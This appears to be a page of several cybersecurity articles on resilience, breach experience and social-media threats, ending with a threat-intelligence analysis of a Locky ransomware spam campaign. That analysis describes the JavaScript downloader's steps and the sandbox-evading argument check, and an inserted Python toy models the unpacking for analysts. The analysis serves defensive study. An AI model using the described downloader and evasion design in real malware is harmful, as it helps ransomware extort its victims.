Jenkins concludes, “Modern-day security requires a fundamental shift away from prevailing preventative solutions that try to prevent breaches at all costs. British businesses must invest in solutions that make security intrinsic to everything – the application, the network, essentially everything that connects and carries data. Breaches are inevitable, but how fast and how effectively you can mitigate that threat and protect the continuity of operations is what matters. Combining this approach with a culture of security awareness and collaboration across all departments is crucial to driving cyber best practice forward, and helping enterprises in the UK and across EMEA stay one step ahead in the world of sophisticated cybercrime.”

Caught in the Crossfire of Cyberwarfare

Authored by Dr Sandra Bell, Head of Resilience Consulting EMEA, Sungard Availability Services

The 2019 National Cyber Security Centre’s (NCSC) Annual Review does not shy away from naming the four key protagonists when it comes to state-based cyber threats against our country. The review cites China, Russia, North Korea and Iran as being actively engaged in cyber operations against our Critical National Infrastructure and other sectors of society. That being said, the main cyber threat to businesses and individual citizens remains organised crime. But with the capability of organised crime matching some state-based activity, and with state-based techniques being shared with (if not directly supplied to) cyber criminals, how are we expected to defend ourselves against such sophisticated means of cyberattack?

The answer offered by Ciaran Martin, CEO of the NCSC, in his Foreword to the 2019 Review only scratches the surface of the cultural change we need to embrace if we are to become truly cyber resilient to these modern-day threats.

“Looking ahead, there is also the risk that advanced cyberattack techniques could find their way into the hands of new actors, through the proliferation of such tools on the open market. Additionally, we must always be mindful of the risk of accidental impact from other attacks. Cyber security has moved away from the exclusive prevail of security and intelligence agencies towards one that needs the involvement of all of government, and indeed all of society.”

There are a few key points to draw out from this statement. Firstly, there is an acceptance that all of us may be collateral damage in a broader state-on-state cyberattack. Secondly, we should also accept that we may be the victims of very sophisticated cyberattacks that have their roots in state-sponsored development. And finally, we must all accept that cyber security is a collective responsibility and, where businesses are concerned, this responsibility must be accepted and owned at the very top.

Modern life is now dependent on cyber security but we are yet to truly embrace the concept of a cyber secure culture. When we perceived terrorism as the major threat to our security, society quickly adopted a ‘reporting culture’ of anything suspicious, but have we seen the same mindset shift with regards to cyber threats? The man in the street may not be the intended target of a state-based or organised crime cyberattack but we can all easily become a victim, either accidentally as collateral damage or intentionally as low-hanging fruit. Either way we can all, individual citizens and businesses alike, fall victim to the new battleground of cyberwarfare.

What can business do in the face of such threats?
One could argue that becoming a victim of cybercrime is a question of when, not if. This can in turn bring about a sense of inevitability. But what is clear when you see the magnitude of recent Information Commissioner’s Office (ICO) fines is that businesses cannot ignore cyber security issues. A business that embraces the idea of a cybersecurity culture within its organisation will not only be less likely to be hit with a fine from the ICO should things go horribly wrong, but is also less likely to fall victim in the first place. Cyber security is about doing the basics well, preparing your organisation to protect itself, and responding correctly when an incident occurs.

Protecting against a new kind of warfare
Organisations need to prepare to potentially become the unintended targets of broad-brush cyberattacks, protecting themselves against the impact these could have on their operations and customer services. With each attack growing in complexity, businesses must in turn respond in a swift and sophisticated manner. Defence mechanisms need to be as scalable as the nefarious incidents they may be up against. To give themselves the best chance of ensuring that an attack doesn’t debilitate them and the country in which they operate, there are a few key things that businesses can do:

1) Act swiftly
A cyberattack requires an immediate response from every part of a business. Therefore, when faced with a potential breach, every individual must know how to react precisely and quickly. IT and business teams will need to locate and close any vulnerabilities in IT systems or business processes and switch over to Disaster Recovery arrangements if they believe there has been a data corruption. Business units need to invoke their Business Continuity Plans and the executive Crisis Management Team needs to assemble. This team needs to be rehearsed in cyber related crisis events and not just the more traditional Business Continuity type of crisis.

Both the speed and effectiveness of a response will be greatly improved if businesses have at their fingertips the results of a Data Protection Impact Assessment (DPIA) that details all the personal data collected, processed and stored, categorised by level of sensitivity. If companies are scrambling around, unsure of who should be taking charge and what exactly should be done, then the damage caused by the data encryption will only be intensified.

2) Isolate the threat
Value flows from business to business through networks and supply chains, but so do malware infections. Having adequate back-up resources not only brings back business availability in the wake of an attack, but it also serves to act as a barrier to further disruption in the network. The key element that cybercriminals and hacking groups have worked to iterate on is their delivery vector.

Phishing attempts are more effective if they’re designed using the techniques employed in social engineering. A study conducted by IBM found that human error accounts for more than 95 per cent of security incidents. The majority of the most devastating attacks from recent years have been of the network-based variety, i.e. worms and bots.

Right now, we live in a highly connected world with hyper-extended networks comprised of a multitude of mobile devices and remote workers logging in from international locations. Having a crisis communication plan that sets out in advance who needs to be contacted should a breach occur will mean that important stakeholders based in different locations don’t get forgotten in the heat of the moment.

3) Rely on resilience
Prevention is always better than cure. Rather than waiting until a data breach occurs to discover the hard way which threats and vulnerabilities are present in IT systems and business processes, act now.

It’s good business practice to continuously monitor risk, including information risk, and ensure that the controls are adequate. However, in the fast-paced cyber world where the threats are constantly changing this can be difficult in practice.

With effective Disaster Recovery and cyber focused Business Continuity practices written into business contingency planning, organisations remain robust and ready to spring into action to minimise the impact of a data breach.

The most effective way to test business resilience without unconscious bias risking false-positive results is via evaluation by external security professionals. By conducting physical and logical penetration testing and regularly checking an organisation’s susceptibility to social engineering, effective business continuity can be ensured, and back-up solutions can be rigorously tested.

Cyber Resilience must be woven into the fabric of business operations, including corporate culture itself. Crisis leadership training ensures the C-suite has the skills, competencies and psychological coping strategies that help lead an organisation through the complex, uncertain and unstable environment that is caused by a cyberattack, emerging the other side stronger and more competitive than ever before.

A look ahead to the future
A cyberattack is never insignificant, nor expected, but if a business suffers one it is important to inform those that are affected as quickly as possible. Given the scale at which these are being launched, this couldn’t be truer. It’s vital in the current age of state-backed attacks that businesses prioritise resilience lest they be caught in the crossfire. In a business landscape defined by hyper-extended supply chains, having a crisis communication plan that sets out in advance who needs to be contacted should a breach occur will mean that important stakeholders don’t get forgotten in the heat of the moment and that the most important assets remain protected.

Why Cybersecurity Breach Survivors are Valued Assets

Guest article By Ewen O’Brien, VP of Enterprise, EMEA at BitSight

No one wants to talk about their failures, especially in the cybersecurity realm where the stakes are high. But new insight from Symantec and Goldsmiths, University of London, finds that security professionals who have lived through a cybersecurity attack or breach could be the answer to protecting your organisation against future threats.

The report reveals that just over half of the 3,000 CISOs surveyed believe that learning from failure is incredibly valuable and a vital part of improving corporate cybersecurity postures. Indeed, these professionals may very well be your company’s best line of defence in the face of a potential cyberattack.

The Value of “Cybersecurity Breach Survivors”

Security professionals who have lived through an avoidable breach possess a unique mindset. They are less likely to experience burnout, are less indifferent to their work, less likely to think about quitting their job, feel less personally responsible for an incident, and are more likely to share their learning experiences. Cybersecurity breach survivors also have the first-hand experience of what works on the frontlines of security performance management and what doesn’t and are well versed in crisis management, recovery procedures, and team focus.

Furthermore, cyberattack veterans have unique perspectives on cybersecurity risk management. They understand that risk mitigation requires more than the right tools and technology. Unless an organisation takes a risk-based view of security, where all stakeholders (not just IT) understand the inherent threat of doing business in a digital world, then all the firewalls, endpoint protection, and other security measures won’t help.

Sharing Insights About Cybersecurity Breaches: The Best Defence
Unfortunately, while many businesses tend to extol the virtues of openness and information-sharing, cybersecurity remains a taboo subject for many. Cyber breaches are treated like a scarlet letter, and security teams are often hesitant to share information or discuss vulnerabilities that led to breaches and lessons learned from those incidents.

That might be why security professionals who’ve “been there and done it” remain unfortunately tight-lipped about their experiences. The Symantec/Goldsmiths study shows that 54% of respondents don’t discuss breaches or attacks with their industry peers, with 36% fearing that sharing this information could impact their professional reputation and career prospects.

This new report flips that thinking on its head, and boldly asserts several best practices: that these learnings should be shared, that company boards should foster a more open learning culture for security teams, and that data breach survivors should be at the top of your company's list of hiring priorities.

Indeed, sharing experiences is critically important, especially since everyone in the company must be involved in protecting the organisation. The cybersecurity skills shortage mandates that everyone, from the CEO on down, needs to take responsibility.

Not adhering to this policy can yield some sobering results. The average cost of a cyber breach has now reached $4.6 million per incident. But the impact extends beyond potential financial and reputational ruin. Security teams are also feeling the burn with 51% of tech executives experiencing cybersecurity burnout and stress-related illnesses as a result of cyberattacks, breaches, and outages.

Experience with Vulnerabilities Can Strengthen Security Performance Management 

We’re all vulnerable about our vulnerabilities. But cybersecurity professionals who have witnessed an attack first-hand should be applauded, not vilified. And they should feel confident that their experience can help their organisations be better prepared for the future. Their experiences – and the knowledge they’ve gained from those experiences – can be used to bolster security performance management and create a formidable front against potential threats.

Eliminating the Social Media Cyber Security Blind Spot

Guest article by Anthony Perridge, VP International, ThreatQuotient
More than three billion people around the world use social media each month, with 90% of those users accessing their chosen platforms via mobile devices. While, historically, financial services (FinServ) institutions discouraged the use of social media, it has become a channel that can no longer be ignored.

FinServ institutions are widely recognised as leaders in cybersecurity, employing layers of defence and highly skilled security experts to protect their organisations. But as the attack surface expands with the growing use of social media and external digital platforms, many FinServ security teams are blind to a new wave of digital threats outside the firewall.

Social media is a morass of information flooding the Internet with billions of posts per day that comprise text, images, hashtags and different types of syntax. It is as broad as it is deep and requires an equally broad and deep combination of defences to identify and mitigate the risk it presents.

Understanding prevalent social media threats
Analysis of prevalent social media risks shows the breadth and depth of these types of attacks. A deeper understanding of how bad actors are using social media and digital platforms for malicious purposes is extremely valuable as FinServ institutions strive to strengthen their defence-in-depth architectures and mitigate risk to their institutions, brands, employees and customers.

To gain visibility, reduce risk and automate protection, leaders in the financial industry are expanding their threat models to include these threat vectors. They are embracing a data-driven approach that uses automation and machine learning to keep pace with these persistent and continuously evolving threats, automatically finding fraudulent accounts, spear-phishing attacks, customer scams, exposed personally identifiable information (PII), account takeovers and more.

They are aggregating this data into a central repository so that their threat intelligence teams can trace attacks back to malicious profiles, posts, comments or pages, as well as pivot between these different social media objects for context. Network security teams can block their users from accessing malicious social objects to help prevent attacks, and incident response teams can compare their organisation’s telemetry of incidents with known indicators of compromise to mitigate damage.

Employee education is also a critical component of standard defences. Raising awareness of these threats through regular training and instituting policies to improve social media security hygiene with respect to company and personal accounts goes a long way to preventing these attacks in the first place.

A Checklist for Financial Institutions
This checklist, which encompasses people, process and technology, will go a long way toward helping FinServ security teams better protect their institutions, brands, employees and customers.
  1. IDENTIFY the institution’s social media and digital footprint, including accounts for the company, brands, locations, executives and key individuals.
  2. OBTAIN “Verified Accounts” for company and brand accounts on social media. This provides assurance to customers that they are interacting with legitimate accounts and prevents impersonators from usurping a “Verified Account.”
  3. ENABLE two-factor authentication for social media accounts to deter hijacking and include corporate and brand social media accounts in IT password policy requirements.
  4. MONITOR for spoofed and impersonator accounts and, when malicious, arrange for takedown.
  5. IDENTIFY scams, fraud, money-flipping and more by monitoring corporate and brand social media pages.
  6. MONITOR for signs of corporate and executive social media account hijacking. Early warning indicators are important in protecting the organisation’s brand.
  7. DEPLOY employee training and policies on social media security hygiene.
  8. INCORPORATE a social media and digital threat feed into a threat intelligence platform as part of an overall defence-in-depth approach. This allows teams to ingest, correlate and take action faster on attacks made against their institution via social media.
Conclusion
FinServ institutions and their customers use many different social networks to communicate and conduct business, but are often blind to the risk bad actors present as they increasingly target these public, uncontrolled channels to commit financial fraud, damage brands and even pose physical threats.

FinServ security teams need visibility into digital threats outside the firewall and actionable information to reduce risk and automate protection. Those that are most successful have a defence-in-depth architecture that includes intelligence on social and digital threats, context to understand what threats pose the greatest risk, and the ability to build on existing processes and workflows to block more threats and accelerate remediation.

Locky is Back Asking for Unpaid Debts

On June 21, 2016, FireEye’s Dynamic Threat Intelligence (DTI) identified an increase in JavaScript contained within spam emails. FireEye analysts determined the increase was the result of a new Locky ransomware spam campaign.

As shown in Figure 1, Locky spam activity was uninterrupted until June 1, 2016, when it stopped for nearly three weeks. During this period, Locky was the most dominant ransomware distributed in spam email. Now, Locky distribution has returned to the level seen during the first half of 2016.

Figure 1. Locky spam activity in 2016

Figure 2 shows that the majority of Locky spam email detections between June 21 and June 23 of this year were recorded in Japan, the United States and South Korea.

Figure 2. Locky spam by country from June 21 to June 23 of this year

The spam email – a sample is shown in Figure 3 – purports to contain an unpaid invoice in an attached ZIP archive. Instead of an invoice, the ZIP archive contains a Locky downloader written in JavaScript.

Figure 3. Locky spam email

JavaScript based Downloader Updates

In this campaign, few updates were seen in both the JavaScript based downloader and the Locky payload.

The JavaScript downloader does the following:

  1. Iterates over an array of URLs hosting the Locky payload.
  2. If a connection to one of the URLs fails, the JavaScript sleeps for 1,000 ms before continuing to iterate over the array of URLs.
  3. Uses a custom XOR-based decryption routine to decrypt the Locky payload.
  4. Ensures the decrypted binary is of a predefined size. In Figure 4 below, the size of the decrypted binary had to be greater than 143,360 bytes and smaller than 153,660 bytes to be executed.

Figure 4. Payload download function in JavaScript

  5. Checks (Figure 5) that the first two bytes of the binary contain the “MZ” header signature.

Figure 5. MZ header check

  6. Executes the decrypted payload by passing it the command line parameter, “123”.

Locky Payload Updates

The Locky ransomware downloaded in this campaign requires a command line argument to properly execute. This command line parameter, “123” in the analyzed sample, is passed to the binary by the first stage JavaScript-based downloader. This command line parameter value is used in the code unpacking stage of the ransomware. Legitimate binaries typically verify the number of arguments passed or compare the command line parameter with the expected value and gracefully exit if the check fails. However, in the case of this Locky ransomware, the program does not exit (Figure 6) and the value received as a command line parameter is added to a constant value defined in the binary. The sum of the constant and the parameter value is used in the decryption routine (Figure 7). If no command line parameter is passed, it adds zero to the constant.

Figure 6. Command line parameter check

Figure 7. Decryption routine

If no command line parameter is passed, then the constant for the decryption routine is incorrect. This results in a program crash, as the decrypted code is invalid. In Figure 8 and Figure 9, we can see the decrypted code sections with and without the command line parameter, respectively.

Figure 8. Correct decrypted code

Figure 9. Incorrect decrypted code

By using this technique, Locky authors have created a dependency on the first stage downloader for the second stage to be executed properly. If a second stage payload such as this is directly analyzed, it will result in a crash.
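A toy model of the argument-dependent unpacking described above, added here as an analyst-side illustration; it is not FireEye's tooling and not Locky's real routine (the real constant and algorithm are only in Figures 6 and 7, so the single-byte XOR, the constant 0x3A and the fake image are constructed stand-ins). It shows why the second stage yields garbage when run without the first stage's "123", reuses the downloader's size window and “MZ” gate as the validity check, and recovers the expected argument from the known header without executing anything.

```python
"""Toy model of Locky's argument-dependent unpacking (added, constructed example)."""
from typing import Optional

# Gates the first-stage JavaScript downloader applies before executing the payload (from the article).
MIN_SIZE = 143_360
MAX_SIZE = 153_660
EXPECTED_ARG = 123

# Constructed stand-in for the constant the binary adds the argument to (the real one is in Figure 7).
TOY_CONSTANT = 0x3A


def toy_key(arg: Optional[int]) -> int:
    """Key = constant + command-line value; a missing argument contributes zero, as in the sample.

    Reduced to one byte for this toy; the real routine is not single-byte XOR.
    """
    return (TOY_CONSTANT + (arg or 0)) & 0xFF


def xor_transform(data: bytes, key: int) -> bytes:
    """Symmetric single-byte XOR used as the toy packer/unpacker."""
    return bytes(b ^ key for b in data)


def passes_downloader_checks(blob: bytes) -> bool:
    """Size window plus 'MZ' signature, the two checks the downloader runs before execution."""
    return MIN_SIZE < len(blob) < MAX_SIZE and blob[:2] == b"MZ"


def build_toy_packed_payload() -> bytes:
    """Fake 'PE image' (MZ header plus deterministic filler) inside the size window, packed
    with the key only the expected argument produces. Constructed data, not a real binary."""
    fake_image = b"MZ" + bytes((i * 7 + 1) & 0xFF for i in range(150_000 - 2))
    return xor_transform(fake_image, toy_key(EXPECTED_ARG))


def unpack(packed: bytes, arg: Optional[int]) -> bytes:
    """What the second stage does at startup with whatever argument it was (or was not) given."""
    return xor_transform(packed, toy_key(arg))


def recover_argument(packed: bytes) -> Optional[int]:
    """Analyst side: the unpacked image must begin with 'MZ', so the key follows from the first
    ciphertext byte, and subtracting the constant (read from the disassembly) gives the argument.
    The second byte is checked too, so a chance single-byte match is not reported."""
    key = packed[0] ^ ord("M")
    if packed[1] ^ key != ord("Z"):
        return None
    return (key - TOY_CONSTANT) & 0xFF


if __name__ == "__main__":
    packed = build_toy_packed_payload()
    print("run with 123:", passes_downloader_checks(unpack(packed, EXPECTED_ARG)))
    print("run with no argument:", passes_downloader_checks(unpack(packed, None)))
    print("argument recovered offline:", recover_argument(packed))
```

The same reasoning tells a sandbox operator why a dropped Locky sample has to be detonated with the argument the first stage would have supplied, rather than on its own.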

Conclusion

As of today, the Locky spam campaign is still ongoing, with an added anti-analysis / sandbox evasion technique. We expect to see additional Locky spam campaigns and will remain vigilant in order to protect our customers.

Email Hashes
